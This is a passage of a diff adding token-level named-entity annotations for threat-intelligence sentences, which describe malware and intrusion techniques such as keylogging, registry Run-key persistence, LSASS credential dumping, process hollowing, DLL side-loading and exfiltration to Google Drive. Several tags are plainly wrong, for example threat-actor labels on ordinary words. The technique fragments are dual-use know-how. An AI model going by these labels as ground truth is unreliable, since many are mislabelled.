"B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-OffAct" + ] + }, + { + "tokens": [ + "Those", + "files", + "will", + "still", + "get", + "executed,", + "if", + "the", + "user", + "clicks", + "on", + "run" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Full", + "path", + "to", + "file", + "and", + "hidden", + "files" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "As", + "LSASS", + "dumps", + "are", + "nowadays", + "recognized", + "by", + "the", + "dump", + "file", + "itself" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "LSASS", + "dump", + "in", + "c:\\tmp", + "detected", + "and", + "deleted" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LSASS", + "dump", + "in", + "the", + "WebDAV", + "detected" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "done", + "via", + "the", + "GetAsyncKeyState", + "API," + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "this", + "is", + "done", + "via", + "the", + "popen", + "API" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "uses", + "Windows", + "API", + "functions", + "to", + "execute", + "files" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "is", + "done", + "via", + "the", + "GetAsyncKeyState", + "API,", + "with", + "keystrokes", + "being", + "logged" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "keylogging", + "are", + "enabled", + "by", + "default," + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "logs", + "keystrokes", + "for", + "windows", + "with", + "titles", + "containing", + "substrings", + "specified", + "in", + "its", + "configuration" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Window", + "titles", + "to", + "keylog" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "can", + "log", + "keystrokes." + ], + "ner_tags": [ + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Screenshots", + "are", + "also", + "taken", + "at", + "a", + "configurable", + "interval;", + "the", + "default", + "is", + "once", + "every", + "30", + "seconds." + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Screenshots", + "and", + "keylogging", + "are", + "enabled", + "by", + "default," + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "can", + "capture", + "screenshots" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "shellcode", + "is", + "stored", + "in", + "files", + "instead", + "of", + "the", + "registry,", + "and", + "the", + "stored", + "shellcode", + "is", + "loaded", + "and", + "executed", + "on", + "Dolphin’s", + "startup" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O" + ] + }, + { + "tokens": [ + "The", + "backdoor", + "periodically", + "checks", + "and", + "creates", + "its", + "own", + "persistence", + "by", + "making", + "sure", + "that", + "Step", + "1", + "of", + "the", + "loader", + "is", + "run", + "every", + "time", + "the", + "system", + "is", + "started,", + "via", + "a", + "registry", + "Run", + "value,", + "in", + "the", + "same", + "way", + "as", + "in", + "the", + "installer:", + "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\<random_run_name>\\”%appdata%\\Python27({32|64})\\pythonw.exe”", + "“<loader_step_1>”", + "“<loader_encrypted_step_2>”" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "uses", + "Run", + "keys", + "for", + "persistence", + "of", + "its", + "loader" + ], + "ner_tags": [ + "O", + "B-Tool", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "can", + "execute", + "shell", + "commands" + ], + "ner_tags": [ + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "creates", + "directory", + "listings" + ], + "ner_tags": [ + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "The", + "command", + "to", + "get", + "specific", + "files" + ], + "ner_tags": [ + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features" + ] + }, + { + "tokens": [ + "It", + "creates", + "directory", + "listings" + ], + "ner_tags": [ + "O", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "to", + "get", + "files", + "from", + "drives" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "it", + "searches", + "the", + "drives", + "of", + "compromised", + "systems", + "for", + "interesting", + "files" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "can", + "obtain", + "file", + "and", + "directory", + "listings." + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "O", + "O", + "B-HackOrg" + ] + }, + { + "tokens": [ + "The", + "following", + "file", + "extensions", + "of", + "interest,", + "specific", + "to", + "media,", + "documents,", + "emails,", + "and", + "certificates," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "can", + "collect", + "files", + "from", + "local", + "drives." + ], + "ner_tags": [ + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Username" + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "obtains", + "the", + "victim’s", + "username." + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Computer", + "name" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "RAM", + "size", + "and", + "usage" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OS", + "version" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "obtains", + "various", + "system", + "information", + "including", + "OS", + "version,", + "computer", + "name", + "and", + "RAM", + "size." + ], + "ner_tags": [ + "B-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "List", + "of", + "installed", + "security", + "products" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "obtains", + "a", + "list", + "of", + "installed", + "security", + "software." + ], + "ner_tags": [ + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Local", + "and", + "external", + "IP", + "address" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "obtains", + "the", + "device’s", + "local", + "and", + "external", + "IP", + "address." + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "XOR-decrypts", + "an", + "embedded", + "PE", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "B-SamFile" + ] + }, + { + "tokens": [ + "XOR-decrypts", + "further", + "shellcode", + "carried", + "within", + "itself," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "XOR-decrypts", + "its", + "contents," + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "decrypted", + "configuration" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "injects", + "it", + "into", + "the", + "created", + "process" + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "in", + "a", + "specified", + "separate", + "process", + "that", + "is", + "created", + "and", + "injected." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "and", + "inject", + "processes." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Features" + ] + }, + { + "tokens": [ + "it", + "creates", + "a", + "one-time", + "scheduled", + "task." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "uses", + "a", + "temporary", + "scheduled", + "task", + "to", + "start", + "after", + "installation." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "After", + "execution,", + "the", + "output", + "of", + "commands", + "is", + "uploaded." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "exfiltrates", + "data", + "to", + "Google", + "Drive", + "storage" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "it", + "searches", + "the", + "drives", + "of", + "compromised", + "systems", + "for", + "interesting", + "files", + "and", + "exfiltrates", + "them", + "to", + "Google", + "Drive." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "exfiltrates", + "data", + "to", + "Google", + "Drive." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "shellcode", + "is", + "stored", + "in", + "the", + "registry," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "sending", + "an", + "HTTP", + "POST", + "request" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "uses", + "HTTPS", + "to", + "communicate", + "with", + "Google", + "Drive." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "staging", + "the", + "data", + "in", + "encrypted", + "ZIP", + "archives", + "before", + "upload." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "stages", + "collected", + "data", + "in", + "a", + "directory", + "before", + "exfiltration" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "content", + "is", + "encrypted", + "using", + "AES", + "CBC", + "with", + "random", + "16-byte", + "keys", + "and", + "IVs," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Most", + "strings", + "in", + "this", + "version", + "are", + "base64", + "encoded." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "base64-encoded", + "strings", + "were", + "plaintext", + "again", + "in", + "this", + "version." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "has", + "encrypted", + "components." + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "another", + "shellcode,", + "XOR-decrypts", + "an", + "embedded", + "PE", + "file", + "–", + "the", + "Dolphin", + "backdoor", + "–", + "and", + "loads", + "and", + "executes", + "it", + "using", + "a", + "custom", + "PE", + "loader." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "which", + "is", + "vulnerable", + "to", + "a", + "DLL", + "side-loading", + "vulnerability,", + "and", + "loads", + "a", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "sideloading", + "different", + "DLL", + "names,", + "and", + "multiple", + "binary", + "files", + "names", + "being", + "loaded", + "by", + "those", + "DLLs." + ], + "ner_tags": [ + "B-Features", + "O", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "executables", + "and", + "sideloaded", + "files" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Side-loaded", + "DLL", + "name" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "threat", + "actor", + "abusing", + "a", + "sideloading", + "vulnerability" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Name", + "of", + "the", + "malicious", + "side-loaded", + "DLL" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SecTeam", + "O" + ] + }, + { + "tokens": [ + "Name", + "of", + "the", + "executable", + "vulnerable", + "to", + "side", + "loading" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "seemingly", + "legitimate", + "executables", + "and", + "their", + "respective", + "sideloaded", + "files" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "encoded", + "shellcode" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "Creates", + "a", + "memory", + "section", + "with", + "the", + "DES-encrypted", + "malware", + "configuration" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "obfuscate", + "their", + "malware." + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "VMProtect", + "to", + "obfuscate", + "one", + "of", + "them." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "that", + "decompresses", + "and", + "loads", + "the", + "first", + "stage", + "in", + "memory." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "shellcode", + "decompressing", + "and", + "loading" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "there", + "was", + "only", + "one", + "stage", + "being", + "decrypted", + "in", + "memory" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "malware", + "decrypts", + "the", + "saved", + "passwords" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "and", + "then", + "decrypts", + "them" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "and", + "then", + "decrypts", + "the", + "content" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "calls", + "Stage", + "1", + "again", + "via", + "process", + "hollowing", + "with", + "four", + "parameters" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "then", + "runs", + "Stage", + "2", + "via", + "process", + "hollowing." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "creates", + "a", + "registry", + "key" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "service", + "that", + "launches", + "the", + "moved", + "executable", + "rc.exe", + "with", + "one", + "parameter." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Screenshot", + "grab" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "Drive", + "information", + "retrieval" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "browses", + "a", + "directory" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Process", + "manager", + "(browses", + "and", + "terminates", + "processes)" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Current", + "process", + "ID" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "deletes," + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "uploads,", + "downloads", + "a", + "file" + ], + "ner_tags": [ + "B-Features", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "Command", + "execution" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "by", + "calling", + "the", + "GetNetworkParams", + "API", + "function" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "Collected", + "machine", + "information", + "includes", + "the", + "following:", + "Randomly", + "generated", + "GUID", + "Hostname" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Processor", + "architecture" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "Operating", + "system", + "version" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Username" + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "Local", + "IP", + "address", + "and", + "port", + "used", + "to", + "send", + "the", + "network", + "packet" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "The", + "configuration", + "is", + "encrypted", + "with", + "a", + "hardcoded", + "DES", + "key", + "and", + "is", + "a", + "few", + "bytes", + "long" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "malware", + "retrieves", + "information", + "on", + "the", + "infected", + "machine", + "and", + "sends", + "it", + "to", + "the", + "C&C", + "encrypted", + "with", + "DES." + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "information", + "is", + "sent", + "to", + "the", + "C&C,", + "encrypted", + "with", + "a", + "hardcoded", + "key", + "and", + "DES", + "CBC", + "algorithm:" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "malware", + "retrieves", + "information", + "on", + "the", + "infected", + "machine", + "and", + "sends", + "it", + "to", + "the", + "C&C" + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Then,", + "the", + "malware", + "retrieves", + "information", + "on", + "the", + "compromised", + "computer", + "and", + "sends", + "it", + "to", + "the", + "C&C." + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "as", + "a", + "lure", + "to", + "entice", + "the", + "victim", + "into", + "opening", + "the", + "malicious", + "file." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "to", + "extract", + "the", + "URL,", + "login,", + "and", + "password", + "fields", + "from", + "the", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Name", + "of", + "the", + "hardcoded", + "directory", + "where", + "files", + "are", + "copied" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "malware", + "also", + "established", + "persistence", + "on", + "the", + "host", + "with", + "the", + "creation", + "of", + "a", + "registry", + "run", + "key." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "persistence", + "was", + "achieved", + "by", + "creating", + "a", + "‘Run’", + "key" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "These", + "files", + "were", + "transferred", + "to", + "the", + "domain", + "controller", + "over", + "SMB." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "dumped", + "lsass", + "memory", + "on", + "the", + "domain", + "controller." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "We", + "observed", + "a", + "process", + "created", + "by", + "Cobalt", + "Strike", + "accessing", + "lsass.exe" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "is", + "a", + "known", + "indicator", + "of", + "such", + "tools", + "as", + "Mimikatz" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "most", + "likely", + "using", + "credentials", + "gathered", + "by", + "the", + "previous", + "LSASS", + "access." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "then", + "proceeded", + "to", + "access", + "lsass", + "memory", + "on", + "the", + "host", + "to", + "extract", + "credentials." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actor", + "became", + "active", + "by", + "initiating", + "a", + "proxied", + "RDP", + "connection", + "via", + "the", + "Cobalt", + "Strike", + "beacon", + "to", + "the", + "domain", + "controller." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "after", + "completing", + "RDP", + "connections", + "to", + "various", + "hosts", + "on", + "the", + "network" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "which", + "were", + "started", + "via", + "their", + "interactive", + "RDP", + "session" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "RDP", + "was", + "also", + "used", + "by", + "the", + "threat", + "actor" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "I-HackOrg", + "I-HackOrg" + ] + }, + { + "tokens": [ + "The", + "threat", + "actor", + "was", + "able", + "to", + "RDP", + "to", + "a", + "backup", + "server" + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "running", + "processes", + "were", + "reviewed" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actors", + "checked", + "running", + "processes", + "on", + "the", + "accessed", + "hosts", + "via", + "taskmanager" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "checking", + "on", + "running", + "tasks," + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "new", + "drive", + "contained", + "a", + "LNK", + "file", + "6570872.lnk", + "and", + "hidden", + "folder", + "“me”." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "The", + "contents", + "of", + "hidden", + "folder", + "“me”,", + "included", + "several", + "files", + "and", + "folders", + "that", + "were", + "used", + "for", + "the", + "execution" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "folder", + "included", + "a", + "legitimate", + "copy", + "of", + "rundll32.exe" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "rundll32.exe", + "binary", + "downloaded", + "approximately", + "0.4", + "MB", + "of", + "data." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "using", + "a", + "renamed", + "copy", + "of", + "rundll32." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Batch", + "script", + "to", + "run" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "file", + "would", + "execute", + "a", + "batch", + "script" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\syswow64\\cmd.exe", + "/C" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "An", + "instance", + "of", + "cmd.exe", + "was", + "launched", + "through", + "explorer.exe", + "which", + "ran", + "the", + "following", + "command" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "cmd.exe", + "session" + ], + "ner_tags": [ + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "The", + "threat", + "actor", + "also", + "used", + "a", + "batch", + "script", + "to", + "collect", + "a", + "list", + "of", + "all", + "computer", + "objects", + "on", + "the", + "domain", + "using", + "C:\\Windows\\system32\\cmd.exe", + "/C", + "adcomp.bat", + "which", + "contained", + "the", + "PowerShell", + "command:" + ], + "ner_tags": [ + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Once", + "the", + "user", + "had", + "mounted", + "the", + "ISO", + "and", + "the", + "LNK", + "file", + "was", + "executed", + "by", + "the", + "user,", + "the", + "complex", + "execution", + "flow", + "started." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "names", + "of", + "the", + "registry", + "values", + "changed" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "last", + "registry", + "key", + "was", + "used", + "to", + "store", + "additional", + "PowerShell", + "code." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "This", + "script", + "called", + "a", + "combination", + "of", + "QueueUserAPC,", + "GetCurrentThreadId,", + "OpenThread,", + "and", + "VirtualAlloc" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "the", + "threat", + "actor", + "injected", + "into", + "various", + "processes" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "reg.exe", + "query" + ], + "ner_tags": [ + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "started", + "a", + "BITS", + "job", + "to", + "download", + "a", + "Cobalt", + "Strike", + "beacon" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool" + ] + }, + { + "tokens": [ + "whoami" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "whoami", + "/groups" + ], + "ner_tags": [ + "B-Idus", + "O" + ] + }, + { + "tokens": [ + "ipconfig", + "/all" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "threat", + "actor", + "first", + "ran", + "some", + "initial", + 